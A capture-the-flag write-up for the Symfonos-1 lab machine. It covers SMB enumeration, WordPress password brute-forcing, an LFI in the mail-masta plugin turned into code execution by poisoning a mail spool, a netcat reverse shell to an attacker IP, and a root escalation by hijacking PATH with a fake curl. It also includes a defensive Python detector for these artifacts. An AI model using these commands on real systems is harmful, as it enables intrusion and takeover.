Last updated: 15 Apr 24 09:34:06 (UTC)

Write-Up Symfonos-1

Symfonos-1

By Lawcky 20/01/24

Introduction

Symfonos-1

Difficulty : Easy+

Additional info:

Name: symfonos: 1
Release date: 29 Jun 2019
Author: Zayotic
Series: symfonos

|NOTE| if you want to see all the scans, we won't copy them here as they would be way too voluminous; click here to see them


In this write-up

  • Nmap
  • Nikto
  • Enum4Linux
  • Wpscan
  • Telnet
  • Log poisoning (LFI)
  • Reverse shell
  • Writable Path

Write-Up

Enum4Linux

we run the enum4linux command against the SMB service


SMB

smbclient -L 192.168.1.90

trying the anonymous user without a password
smbclient --user anonymous //192.168.1.90/anonymous

we download the file using get

using these passwords with the known username helios

smbclient --user helios //192.168.1.90/helios

helios:qwerty
(this is not the Linux user's password)

found a WordPress site


WordPress

wpscan --> here

we add symfonos.local to /etc/hosts

user enumeration
user ‘helios’ is not valid, user ‘admin’ is

brute-forcing the admin password with wpscan

wpscan -U admin -P ~/tools/seclists/rockyou.txt --url http://symfonos.local/h3l105/

enumerate all plugins and themes

wpscan -e ap at --url http://symfonos.local/h3l105/

found this plugin

searchsploit mail masta

the SQLi didn't work

found the LFI at http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd


Log Poisoning

since we have an LFI, we can try log poisoning to get remote code execution.

we can't find the Apache logs, so let's try the SMTP service instead.

LFI to /var/mail/helios

it worked

we need to send a mail to helios@symfonos.local using the SMTP service

telnet symfonos.local 25
ehlo 192.168.1.90

then using

MAIL TO: name
RCPT TO: helios
DATA
and end with a line containing only .

now let's try the RCE

view-source:http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=ls

it worked
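
From the defender's side, this chain leaves two artifacts: an LFI request against the plugin's pl parameter in the web server's access log, and an opening PHP tag inside the user's mail spool. The following added example (my own code, not from the original write-up) checks constructed samples of both; the log lines, the spool text and the flagging rules are assumptions modelled on the request above.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample access-log lines (Combined Log Format), not from the target.
ACCESS_LOG = """\
192.168.1.253 - - [20/Jan/2024:10:01:02 +0000] "GET /h3l105/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.1.253 - - [20/Jan/2024:10:02:10 +0000] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 1839 "-" "Mozilla/5.0"
192.168.1.253 - - [20/Jan/2024:10:05:33 +0000] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=ls HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
192.168.1.253 - - [20/Jan/2024:10:06:00 +0000] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1839 "-" "Mozilla/5.0"
192.168.1.253 - - [20/Jan/2024:10:07:00 +0000] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=list.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""

# Constructed excerpt of /var/mail/helios after a poisoning attempt (payload elided).
MAIL_SPOOL = """\
From someone@example.test Sat Jan 20 10:04:00 2024
Subject: hello
<?php /* injected code would sit here */ ?>
From colleague@example.test Sat Jan 20 10:30:00 2024
Subject: meeting notes
Nothing unusual in this message.
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# An opening PHP tag is what makes include()-based LFI execute spool content.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)


def suspicious_requests(log_text):
    """Return (line_no, decoded pl value) for count_of_send.php requests whose pl
    parameter is an absolute path, a traversal, or a PHP stream wrapper."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlparse(m.group(1))
        if not url.path.endswith("/count_of_send.php"):
            continue
        for val in parse_qs(url.query).get("pl", []):
            while unquote(val) != val:  # peel double (or deeper) URL encoding
                val = unquote(val)
            if val.startswith("/") or ".." in val or "://" in val:
                hits.append((n, val))
    return hits


def poisoned_spool_lines(spool_text):
    """Return the line numbers in a mail spool that carry an opening PHP tag."""
    return [n for n, line in enumerate(spool_text.splitlines(), 1)
            if PHP_TAG_RE.search(line)]
```

Run against real logs, the first function points at which spool or system file was pulled through the include, and the second tells you whether the spool itself now carries executable content.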


Reverse Shell

after some tries, the reverse shell that worked was the netcat one

nc -e /bin/sh 192.168.1.253 4444

we are directly connected as the helios user


Privilege Escalation

from helios to root

found this among the SUID binaries owned by root

it seems that it runs the date command as well as the curl command, neither by its absolute path

Writable Path

we added /tmp to the PATH; now let's create a fake curl file in /tmp to be called instead of the actual curl command.

echo '/bin/bash' > /tmp/curl

it ran as the helios user

it turns out that with a writable-PATH hijack, if you call /bin/bash instead of /bin/sh the privesc won't work (bash drops the elevated effective UID back to the real UID unless it is started with -p)

after trying again with /bin/sh:

we got the flag